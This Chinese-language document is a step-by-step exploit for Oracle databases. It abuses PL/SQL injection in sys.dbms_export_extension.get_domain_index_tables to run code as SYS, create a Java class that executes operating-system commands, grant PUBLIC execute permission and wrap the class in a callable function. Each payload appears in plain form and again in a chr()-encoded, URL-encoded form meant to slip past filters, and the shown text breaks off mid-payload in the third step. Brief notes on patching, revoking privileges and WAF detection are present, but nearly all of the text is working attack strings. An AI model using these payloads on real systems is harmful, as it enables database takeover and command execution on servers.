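利用 sys.dbms_export_extension.get_domain_index_tables 的 PL/SQL 注入执行系统命令(cmd):
(该包属于 SYS 并以定义者权限运行,因此注入的匿名块以 SYS 身份执行;防护上应安装 Oracle 对应的安全补丁,并撤销 PUBLIC 对 DBMS_EXPORT_EXTENSION 的 EXECUTE 权限。)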

 ------------------------------------------------------------------------------------------------
下面的语句均出自 http://notsosecure.com/folder2/ora_cmd_exec.txt ,该地址可以直接访问:
 第一步(创建 Java 源 PANGOLIN,其 executeCmd 方法用 Runtime.exec 执行传入的命令并返回输出):

and 0=sys.dbms_export_extension.get_domain_index_tables(FOO,BAR,DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''create or replace and compile java source named "PANGOLIN" as import java.io.*;public class PANGOLIN extends Object { public static String executeCmd(String cmdstring){  try{   BufferedReader myReader= new BufferedReader(    new InputStreamReader( Runtime.getRuntime().exec(cmdstring).getInputStream())   );   String stemp,str="";   while ((stemp = myReader.readLine()) != null)    str +=stemp+"\n";   myReader.close();return str;  }  catch (Exception e){   return e.toString();  } }}'';END;';END;--,SYS,0,1,0)and 1=1

 ************************把字符串改写成 chr(ASCII码) 拼接并做 URL 编码(%7C%7C 即 ||)后就成下面的***********************************************
 (请求参数中出现大量连续的 chr(N)||chr(N) 拼接,本身就是 WAF 和访问日志中可用于检测的特征。)

 %20and%200=sys.dbms_export_extension.get_domain_index_tables(chr(70)%7C%7Cchr(79)%7C%7Cchr(79),chr(66)%7C%7Cchr(65)%7C%7Cchr(82),chr(68)%7C%7Cchr(66)%7C%7Cchr(77)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(34)%7C%7Cchr(46)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(40)%7C%7Cchr(58)%7C%7Cchr(80)%7C%7Cchr(49)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(68)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(76)%7C%7Cchr(65)%7C%7Cchr(82)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(80)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(71)%7C%7Cchr(77)%7C%7Cchr(65)%7C%7Cchr(32)%7C%7Cchr(65)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(79)%7C%7Cchr(77)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(84)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(78)%7C%7Cchr(83)%7C%7Cchr(65)%7C%7Cchr(67)%7C%7Cchr(84)%7C%7Cchr(73)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(59)%7C%7Cchr(66)%7C%7Cchr(69)%7C%7Cchr(71)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(32)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(99)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(32)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(112)%7C%7Cchr(108)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(100)%7C%7Cchr(32)%7C%7Cchr(99)%7C%7Cchr(111)%7C%7Cchr(109)%7C%7Cchr(112)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(106)%7C%7Cchr(97)%7C%7Cchr(118)%7C%7Cchr(97)%7C%7Cchr(32)%7C%7Cchr(115)%7C%7Cchr(111)%7C%7Cc
hr(117)%7C%7Cchr(114)%7C%7Cchr(99)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(110)%7C%7Cchr(97)%7C%7Cchr(109)%7C%7Cchr(101)%7C%7Cchr(100)%7C%7Cchr(32)%7C%7Cchr(34)%7C%7Cchr(80)%7C%7Cchr(65)%7C%7Cchr(78)%7C%7Cchr(71)%7C%7Cchr(79)%7C%7Cchr(76)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(34)%7C%7Cchr(32)%7C%7Cchr(97)%7C%7Cchr(115)%7C%7Cchr(32)%7C%7Cchr(105)%7C%7Cchr(109)%7C%7Cchr(112)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(116)%7C%7Cchr(32)%7C%7Cchr(106)%7C%7Cchr(97)%7C%7Cchr(118)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(105)%7C%7Cchr(111)%7C%7Cchr(46)%7C%7Cchr(42)%7C%7Cchr(59)%7C%7Cchr(112)%7C%7Cchr(117)%7C%7Cchr(98)%7C%7Cchr(108)%7C%7Cchr(105)%7C%7Cchr(99)%7C%7Cchr(32)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(97)%7C%7Cchr(115)%7C%7Cchr(115)%7C%7Cchr(32)%7C%7Cchr(80)%7C%7Cchr(65)%7C%7Cchr(78)%7C%7Cchr(71)%7C%7Cchr(79)%7C%7Cchr(76)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(32)%7C%7Cchr(101)%7C%7Cchr(120)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(110)%7C%7Cchr(100)%7C%7Cchr(115)%7C%7Cchr(32)%7C%7Cchr(79)%7C%7Cchr(98)%7C%7Cchr(106)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(32)%7C%7Cchr(123)%7C%7Cchr(9)%7C%7Cchr(112)%7C%7Cchr(117)%7C%7Cchr(98)%7C%7Cchr(108)%7C%7Cchr(105)%7C%7Cchr(99)%7C%7Cchr(32)%7C%7Cchr(115)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(105)%7C%7Cchr(99)%7C%7Cchr(32)%7C%7Cchr(83)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(32)%7C%7Cchr(101)%7C%7Cchr(120)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(117)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(67)%7C%7Cchr(109)%7C%7Cchr(100)%7C%7Cchr(40)%7C%7Cchr(83)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(32)%7C%7Cchr(99)%7C%7Cchr(109)%7C%7Cchr(100)%7C%7Cchr(115)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(41)%7C%7Cchr(123)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(121)%7C%7Cchr(123)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(66)%7C%7Cchr(117)%7C%7Cchr(102)%7C%7Cchr(102)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(100)%7C%7Cc
hr(82)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(32)%7C%7Cchr(109)%7C%7Cchr(121)%7C%7Cchr(82)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(61)%7C%7Cchr(32)%7C%7Cchr(110)%7C%7Cchr(101)%7C%7Cchr(119)%7C%7Cchr(32)%7C%7Cchr(66)%7C%7Cchr(117)%7C%7Cchr(102)%7C%7Cchr(102)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(100)%7C%7Cchr(82)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(40)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(110)%7C%7Cchr(101)%7C%7Cchr(119)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(110)%7C%7Cchr(112)%7C%7Cchr(117)%7C%7Cchr(116)%7C%7Cchr(83)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(109)%7C%7Cchr(82)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(40)%7C%7Cchr(32)%7C%7Cchr(82)%7C%7Cchr(117)%7C%7Cchr(110)%7C%7Cchr(116)%7C%7Cchr(105)%7C%7Cchr(109)%7C%7Cchr(101)%7C%7Cchr(46)%7C%7Cchr(103)%7C%7Cchr(101)%7C%7Cchr(116)%7C%7Cchr(82)%7C%7Cchr(117)%7C%7Cchr(110)%7C%7Cchr(116)%7C%7Cchr(105)%7C%7Cchr(109)%7C%7Cchr(101)%7C%7Cchr(40)%7C%7Cchr(41)%7C%7Cchr(46)%7C%7Cchr(101)%7C%7Cchr(120)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(40)%7C%7Cchr(99)%7C%7Cchr(109)%7C%7Cchr(100)%7C%7Cchr(115)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(41)%7C%7Cchr(46)%7C%7Cchr(103)%7C%7Cchr(101)%7C%7Cchr(116)%7C%7Cchr(73)%7C%7Cchr(110)%7C%7Cchr(112)%7C%7Cchr(117)%7C%7Cchr(116)%7C%7Cchr(83)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(109)%7C%7Cchr(40)%7C%7Cchr(41)%7C%7Cchr(41)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(83)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(32)%7C%7Cchr(115)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(112)%7C%7Cchr(44)%7C%7Cchr(115)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(61)%7C%7Cchr(34)%7C%7Cchr(34)%7C%7Cchr(59)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cc
hr(119)%7C%7Cchr(104)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(40)%7C%7Cchr(40)%7C%7Cchr(115)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(112)%7C%7Cchr(32)%7C%7Cchr(61)%7C%7Cchr(32)%7C%7Cchr(109)%7C%7Cchr(121)%7C%7Cchr(82)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(46)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(76)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(101)%7C%7Cchr(40)%7C%7Cchr(41)%7C%7Cchr(41)%7C%7Cchr(32)%7C%7Cchr(33)%7C%7Cchr(61)%7C%7Cchr(32)%7C%7Cchr(110)%7C%7Cchr(117)%7C%7Cchr(108)%7C%7Cchr(108)%7C%7Cchr(41)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(115)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(32)%7C%7Cchr(43)%7C%7Cchr(61)%7C%7Cchr(115)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(112)%7C%7Cchr(43)%7C%7Cchr(34)%7C%7Cchr(92)%7C%7Cchr(110)%7C%7Cchr(34)%7C%7Cchr(59)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(109)%7C%7Cchr(121)%7C%7Cchr(82)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(46)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(40)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(116)%7C%7Cchr(117)%7C%7Cchr(114)%7C%7Cchr(110)%7C%7Cchr(32)%7C%7Cchr(115)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(59)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(125)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(99)%7C%7Cchr(104)%7C%7Cchr(32)%7C%7Cchr(40)%7C%7Cchr(69)%7C%7Cchr(120)%7C%7Cchr(99)%7C%7Cchr(101)%7C%7Cchr(112)%7C%7Cchr(116)%7C%7Cchr(105)%7C%7Cchr(111)%7C%7Cchr(110)%7C%7Cchr(32)%7C%7Cchr(101)%7C%7Cchr(41)%7C%7Cchr(123)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(116)%7C%7Cchr(117)%7C%7Cchr(114)%7C%7Cchr(110)%7C%7Cchr(32)%7C%7Cchr(101)%7C%7Cchr(46)%7C%7Cchr(116)%7C%7Cchr(111)%7C%7Cchr(83)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(40)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(9)%7C%7Cchr(9)%7C%7Cchr(125)%7C%7Cchr(9)%7C%7C
chr(125)%7C%7Cchr(125)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(45)%7C%7Cchr(45),chr(83)%7C%7Cchr(89)%7C%7Cchr(83),0,chr(49),0)%20and%201=1 

 =======================================================================================

第二步(用 dbms_java.grant_permission 给 PUBLIC 授予 java.io.FilePermission 的 execute 权限):

 and 0=sys.dbms_export_extension.get_domain_index_tables(FOO,BAR,DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''begin dbms_java.grant_permission( ''''PUBLIC'''', ''''SYS:java.io.FilePermission'''', ''''<>'''', ''''execute'''' );end;'';END;';END;--,SYS,0,1,0) and 1=1
        **************************************************

 %20and%200=sys.dbms_export_extension.get_domain_index_tables(chr(70)%7C%7Cchr(79)%7C%7Cchr(79),chr(66)%7C%7Cchr(65)%7C%7Cchr(82),chr(68)%7C%7Cchr(66)%7C%7Cchr(77)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(34)%7C%7Cchr(46)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(40)%7C%7Cchr(58)%7C%7Cchr(80)%7C%7Cchr(49)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(68)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(76)%7C%7Cchr(65)%7C%7Cchr(82)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(80)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(71)%7C%7Cchr(77)%7C%7Cchr(65)%7C%7Cchr(32)%7C%7Cchr(65)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(79)%7C%7Cchr(77)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(84)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(78)%7C%7Cchr(83)%7C%7Cchr(65)%7C%7Cchr(67)%7C%7Cchr(84)%7C%7Cchr(73)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(59)%7C%7Cchr(66)%7C%7Cchr(69)%7C%7Cchr(71)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(32)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(98)%7C%7Cchr(101)%7C%7Cchr(103)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(32)%7C%7Cchr(100)%7C%7Cchr(98)%7C%7Cchr(109)%7C%7Cchr(115)%7C%7Cchr(95)%7C%7Cchr(106)%7C%7Cchr(97)%7C%7Cchr(118)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(103)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(116)%7C%7Cchr(95)%7C%7Cchr(112)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(109)%7C%7Cchr(105)%7C%7Cchr(115)%7C%7Cchr(115)%7C%7Cchr(105)%7C%7Cchr(111)%7C%7Cchr(110)%7C%7Cchr(40)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cc
hr(39)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(66)%7C%7Cchr(76)%7C%7Cchr(73)%7C%7Cchr(67)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(44)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(83)%7C%7Cchr(89)%7C%7Cchr(83)%7C%7Cchr(58)%7C%7Cchr(106)%7C%7Cchr(97)%7C%7Cchr(118)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(105)%7C%7Cchr(111)%7C%7Cchr(46)%7C%7Cchr(70)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(80)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(109)%7C%7Cchr(105)%7C%7Cchr(115)%7C%7Cchr(115)%7C%7Cchr(105)%7C%7Cchr(111)%7C%7Cchr(110)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(44)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(60)%7C%7Cchr(62)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(44)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(101)%7C%7Cchr(120)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(117)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(32)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(101)%7C%7Cchr(110)%7C%7Cchr(100)%7C%7Cchr(59)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(45)%7C%7Cchr(45),chr(83)%7C%7Cchr(89)%7C%7Cchr(83),0,chr(49),0)%20and%201=1 

 ==========================================================================================

第三步(创建 PL/SQL 函数 executeCmd,作为 PANGOLIN.executeCmd 的调用封装):

 and 0=sys.dbms_export_extension.get_domain_index_tables(FOO,BAR,DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''create or replace function executeCmd(cmdstring in varchar2)  return varchar2  as language java name ''''PANGOLIN.executeCmd(java.lang.String) return String'''';'';END;';END;--,SYS,0,1,0) and 1=1

          *********************************************************

 %20and%200=sys.dbms_export_extension.get_domain_index_tables(chr(70)%7C%7Cchr(79)%7C%7Cchr(79),chr(66)%7C%7Cchr(65)%7C%7Cchr(82),chr(68)%7C%7Cchr(66)%7C%7Cchr(77)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(34)%7C%7Cchr(46)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(40)%7C%7Cchr(58)%7C%7Cchr(80)%7C%7Cchr(49)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(68)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(76)%7C%7Cchr(65)%7C%7Cchr(82)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(80)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(71)%7C%7Cchr(77)%7C%7Cchr(65)%7C%7Cchr(32)%7C%7Cchr(65)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(79)%7C%7Cchr(77)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(84)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(78)%7C%7Cchr(83)%7C%7Cchr(65)%7C%7Cchr(67)%7C%7Cchr(84)%7C%7Cchr(73)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(59)%7C%7Cchr(66)%7C%7Cchr(69)%7C%7Cchr(71)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(32)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(99)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(32)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(112)%7C%7Cchr(108)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(102)%7C%7Cchr(117)%7C%7Cchr(110)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(105)%7C%7Cchr(111)%7C%7Cchr(110)%7C%7Cchr(32)%7C%7Cchr(101)%7C%7Cchr(120)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(117)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(67)%7C%7Cchr(109)%7C%7Cchr(100)%7C%
7Cchr(40)%7C%7Cchr(99)%7C%7Cchr(109)%7C%7Cchr(100)%7C%7Cchr(115)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(32)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(32)%7C%7Cchr(118)%7C%7Cchr(97)%7C%7Cchr(114)%7C%7Cchr(99)%7C%7Cchr(104)%7C%7Cchr(97)%7C%7Cchr(114)%7C%7Cchr(50)%7C%7Cchr(41)%7C%7Cchr(32)%7C%7Cchr(32)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(116)%7C%7Cchr(117)%7C%7Cchr(114)%7C%7Cchr(110)%7C%7Cchr(32)%7C%7Cchr(118)%7C%7Cchr(97)%7C%7Cchr(114)%7C%7Cchr(99)%7C%7Cchr(104)%7C%7Cchr(97)%7C%7Cchr(114)%7C%7Cchr(50)%7C%7Cchr(32)%7C%7Cchr(32)%7C%7Cchr(97)%7C%7Cchr(115)%7C%7Cchr(32)%7C%7Cchr(108)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(117)%7C%7Cchr(97)%7C%7Cchr(103)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(106)%7C%7Cchr(97)%7C%7Cchr(118)%7C%7Cchr(97)%7C%7Cchr(32)%7C%7Cchr(110)%7C%7Cchr(97)%7C%7Cchr(109)%7C%7Cchr(101)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(80)%7C%7Cchr(65)%7C%7Cchr(78)%7C%7Cchr(71)%7C%7Cchr(79)%7C%7Cchr(76)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(46)%7C%7Cchr(101)%7C%7Cchr(120)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(117)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(67)%7C%7Cchr(109)%7C%7Cchr(100)%7C%7Cchr(40)%7C%7Cchr(106)%7C%7Cchr(97)%7C%7Cchr(118)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(108)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(46)%7C%7Cchr(83)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(41)%7C%7Cchr(32)%7C%7Cchr(114)%7C%7Cchr(101)%7C%7Cchr(116)%7C%7Cchr(117)%7C%7Cchr(114)%7C%7Cchr(110)%7C%7Cchr(32)%7C%7Cchr(83)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7